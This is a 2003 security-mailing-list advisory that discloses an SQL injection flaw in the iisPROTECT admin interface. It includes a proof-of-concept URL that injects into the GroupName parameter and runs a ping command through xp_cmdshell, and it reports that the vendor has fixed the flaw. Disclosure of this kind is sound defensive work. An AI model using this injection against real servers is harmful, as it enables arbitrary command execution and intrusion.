[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <200305231415.42014@gyrniff>
Date: Fri, 23 May 2003 14:15:42 +0200
From: Gyrniff <frohn@...erbruger.dk>
To: bugtraq@...urityfocus.com
Cc: full-disclosure@...ts.netsys.com
Subject: iisPROTECT SQL injection in admin interface
Release Date: 23.05.2003
Application: iisPROTECT v/2.2-r4 (and probably earlier versions)
Vendor: iisPROTECT
#536, 425 Carrall St.
Vancouver, BC,
V6B6E3, Canada
http://www.iisprotect.com/
Category: SQL injection in admin interface
Risk: Medium-High
Impact: Arbitrary command execution
Vendor Status: First notified 15/04-2003 17:36 (+1)
Fixed 15/04-2003 22:47 (+1)
Author: Torben 'Gyrniff' Frohn
email: nn@...niff.dk
Intro
====
From vendor site: "iisPROTECT is a high performance user authentication,
password protection and member system".
iisPROTECT has a webbased admin interface, the interface lacks sanitising on
almost every variable. Successfully exploited some of the variables can be
used to inject and execute SQL statements.
iisPROTECT uses either a MS access file or a MS SQL-server. In the testing
environment the MS SQL-server solution is chosen.
Exploit (Proof of Concept)
===================
The following URL exploits the "GroupName" variable and uses the stored
procedure "xp_cmdshell" to execute the command "ping":
http://x.x.x.x/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20master..xp_cmdshell'ping%2010.10.10.11';--
Fix
===
Vendor has fixed this problem.
Credits
=====
Vulnerability found by Torben Frohn (Gyrniff)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists